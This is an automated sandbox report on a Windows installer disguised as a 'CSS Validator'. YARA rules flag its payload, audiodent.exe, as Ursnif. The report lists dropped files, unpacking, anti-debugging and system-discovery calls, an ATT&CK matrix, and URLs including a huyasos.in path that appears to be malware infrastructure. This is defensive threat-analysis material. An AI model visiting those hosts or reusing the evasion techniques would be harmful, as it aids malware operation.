Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Jump to behavior

Source: C:\Users\user\Desktop\yRqHWQ91dT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\yRqHWQ91dT.exe

1_2_00403348

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Hemoco bvba

Jump to behavior

Source: C:\Users\user\Desktop\yRqHWQ91dT.exe

File created: C:\Users\user\AppData\Local\Temp\nsz2BB.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/22@3/1

Source: C:\Users\user\Desktop\yRqHWQ91dT.exe

Code function: 1_2_0040216B CoCreateInstance,MultiByteToWideChar,

1_2_0040216B

Source: C:\Users\user\Desktop\yRqHWQ91dT.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\yRqHWQ91dT.exe

Code function: 1_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

1_2_0040460D

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe

Code function: 9_2_07F78F1B CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

9_2_07F78F1B

Source: yRqHWQ91dT

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe

Mutant created: \Sessions\1\BaseNamedObjects\COIN_LIBRARY_PROCESS_5656

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: yRqHWQ91dT.exe

Static file information: File size 7580858 > 1048576

Source: yRqHWQ91dT.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256 source: SQLitePCLRaw.core.dll.4.dr
Source:	Binary string: C:\pdb\pdb\AppData\Service\dkdockhost\WPF\Data\ExpressAuthentication\Csv.pdb source: audiodent.exe, 00000009.00000000.279418131.0000000001217000.00000002.00020000.sdmp, audiodent.exe.4.dr
Source:	Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: SQLitePCLRaw.core.dll.4.dr
Source:	Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlcipher.most\obj\Release\netstandard2.0\SQLitePCLRaw.provider.e_sqlcipher.pdbSHA256y source: SQLitePCLRaw.provider.e_sqlcipher.dll.4.dr
Source:	Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlcipher.most\obj\Release\netstandard2.0\SQLitePCLRaw.provider.e_sqlcipher.pdb source: SQLitePCLRaw.provider.e_sqlcipher.dll.4.dr
Source:	Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlcipher.dllimport\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256 source: SQLitePCLRaw.batteries_v2.dll.4.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbj source: 530d7c.msi.4.dr
Source:	Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlcipher.dllimport\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: SQLitePCLRaw.batteries_v2.dll.4.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: 530d7c.msi.4.dr
Source:	Binary string: C:\pdb\pdb\AppData\Service\dkdockhost\WPF\Data\ExpressAuthentication\Csv.pdb,88 source: audiodent.exe, 00000009.00000000.279418131.0000000001217000.00000002.00020000.sdmp, audiodent.exe.4.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe

Unpacked PE file: 9.2.audiodent.exe.980000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe

Unpacked PE file: 9.2.audiodent.exe.980000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_07F7AFAF push ecx; ret	9_2_07F7AFBF
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_07F7E9AC push 0B565A71h; ret	9_2_07F7E9B1
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_07F7E62F push edi; retf	9_2_07F7E630
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_07F7AC00 push ecx; ret	9_2_07F7AC09

Source: libEGL.dll.4.dr	Static PE information: section name: .00cfg
Source: libEGL.dll.4.dr	Static PE information: section name: .voltbl

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe

Code function: 9_2_00981264 LoadLibraryA,GetProcAddress,

9_2_00981264

Source: yRqHWQ91dT.exe	Static PE information: real checksum: 0x0 should be: 0x742c54
Source: libEGL.dll.4.dr	Static PE information: real checksum: 0x0 should be: 0x1b503
Source: audiodent.exe.4.dr	Static PE information: real checksum: 0xa095fa should be:
Source: qclp2.dll.4.dr	Static PE information: real checksum: 0x403d8b should be: 0x4105cf
Source: Typography.GlyphLayout.dll.4.dr	Static PE information: real checksum: 0x0 should be: 0x73e6

Source: SQLitePCLRaw.batteries_v2.dll.4.dr

Static PE information: 0xA466DFED [Sun May 27 16:10:21 2057 UTC]

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\zmq

Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\Typography.GlyphLayout.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.batteries_v2.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\libEGL.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\qclp2.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.provider.e_sqlcipher.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI17DA.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI14BC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.provider.dynamic_cdecl.dll	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI17DA.tmp			Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI14BC.tmp			Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\License.txt	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\ReadMe.txt	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\LICENSE.electron.txt	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000009.00000003.462453858.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462430424.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.524066037.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462394649.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462483110.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462302321.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462367584.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462337552.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462470017.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: audiodent.exe PID: 5656, type: MEMORYSTR
Source: Yara match	File source: 9.2.audiodent.exe.7f70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.audiodent.exe.83b94a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.audiodent.exe.83b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.524018514.00000000083B9000.00000004.00000040.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\msiexec.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\yRqHWQ91dT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe TID: 2200

Thread sleep time: -240000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\Typography.GlyphLayout.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.batteries_v2.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\libEGL.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.provider.e_sqlcipher.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI17DA.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.provider.dynamic_cdecl.dll	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe

Thread delayed: delay time: 240000

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\yRqHWQ91dT.exe	Code function: 1_2_0040646B FindFirstFileA,FindClose,	1_2_0040646B
Source: C:\Users\user\Desktop\yRqHWQ91dT.exe	Code function: 1_2_004027A1 FindFirstFileA,	1_2_004027A1
Source: C:\Users\user\Desktop\yRqHWQ91dT.exe	Code function: 1_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	1_2_004058BF

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe

Thread delayed: delay time: 240000

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe

Code function: 9_2_6EA60A70 LoadLibraryW,GetProcAddress,SetThreadDescription,GetCurrentThread,SetThreadDescription,IsDebuggerPresent,RaiseException,

9_2_6EA60A70

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe

Code function: 9_2_00981264 LoadLibraryA,GetProcAddress,

9_2_00981264

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_6EB36EF7 mov eax, dword ptr fs:[00000030h]	9_2_6EB36EF7
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_6EB33A55 mov eax, dword ptr fs:[00000030h]	9_2_6EB33A55
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_6EB36F7F mov eax, dword ptr fs:[00000030h]	9_2_6EB36F7F

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_6EB25F3D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		9_2_6EB25F3D
Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	Code function: 9_2_6EB16501 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		9_2_6EB16501

Source: audiodent.exe, 00000009.00000002.523021311.00000000021E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: audiodent.exe, 00000009.00000002.523021311.00000000021E0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: audiodent.exe, 00000009.00000002.523021311.00000000021E0000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: audiodent.exe, 00000009.00000002.523021311.00000000021E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: audiodent.exe, 00000009.00000002.523021311.00000000021E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\msiexec.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe

Code function: 9_2_07F77A2E cpuid

9_2_07F77A2E

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe

Code function: 9_2_00981E22 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

9_2_00981E22

Source: C:\Users\user\Desktop\yRqHWQ91dT.exe

1_2_00403348

Source: C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe

Code function: 9_2_07F77A2E RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

9_2_07F77A2E

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000009.00000003.462453858.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462430424.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.524066037.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462394649.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462483110.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462302321.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462367584.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462337552.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462470017.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: audiodent.exe PID: 5656, type: MEMORYSTR
Source: Yara match	File source: 9.2.audiodent.exe.7f70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.audiodent.exe.83b94a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.audiodent.exe.83b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.524018514.00000000083B9000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000009.00000003.462453858.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462430424.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.524066037.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462394649.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462483110.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462302321.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462367584.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462337552.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.462470017.0000000008A28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: audiodent.exe PID: 5656, type: MEMORYSTR
Source: Yara match	File source: 9.2.audiodent.exe.7f70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.audiodent.exe.83b94a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.audiodent.exe.83b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.524018514.00000000083B9000.00000004.00000040.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	Input Capture21	System Time Discovery1	Replication Through Removable Media1	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Access Token Manipulation1	Obfuscated Files or Information1	LSASS Memory	Peripheral Device Discovery11	Remote Desktop Protocol	Input Capture21	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection2	Software Packing21	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Timestomp1	NTDS	File and Directory Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	System Information Discovery25	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	File Deletion1	Cached Domain Credentials	Query Registry1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading31	DCSync	Security Software Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion21	Proc Filesystem	Virtualization/Sandbox Evasion21	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Access Token Manipulation1	/etc/passwd and /etc/shadow	Process Discovery3	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection2	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	Remote System Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
yRqHWQ91dT.exe	13%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\audiodent.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.batteries_v2.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.batteries_v2.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.core.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.core.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.provider.dynamic_cdecl.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.provider.dynamic_cdecl.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.provider.e_sqlcipher.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\SQLitePCLRaw.provider.e_sqlcipher.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\Typography.GlyphLayout.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\Typography.GlyphLayout.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\libEGL.dll	3%	Metadefender	Browse
C:\Users\user\AppData\Roaming\Hemoco bvba\CSS Validator\libEGL.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.yRqHWQ91dT.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
9.2.audiodent.exe.7f70000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
1.0.yRqHWQ91dT.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
9.2.audiodent.exe.980000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://get.updates.avast.cn/I	0%	Avira URL Cloud	safe
https://huyasos.in/sreamble/1Cy_2BOoNkPfZNI/cBFrvY8_2BuNL_2FRI/EvMKECOy8/d_2Bs3isSO64yzYzMTFW/VpmMJy	0%	Avira URL Cloud	safe
http://www.grsoftware.net/downloads/grbackpro/grbakpro.pdf	0%	Avira URL Cloud	safe
https://www.grsoftware.net	0%	Avira URL Cloud	safe
https://huyasos.in/	0%	Avira URL Cloud	safe
http://www.grsoftware.net/home/buynow.html	0%	Avira URL Cloud	safe
https://huyasos.in/sreamble/1Cy_2BOoNkPfZNI/cBFrvY8_2BuNL_2FRI/EvMKECOy8/d_2Bs3isSO	0%	Avira URL Cloud	safe
https://get.updates.avast.cn/	0%	Avira URL Cloud	safe
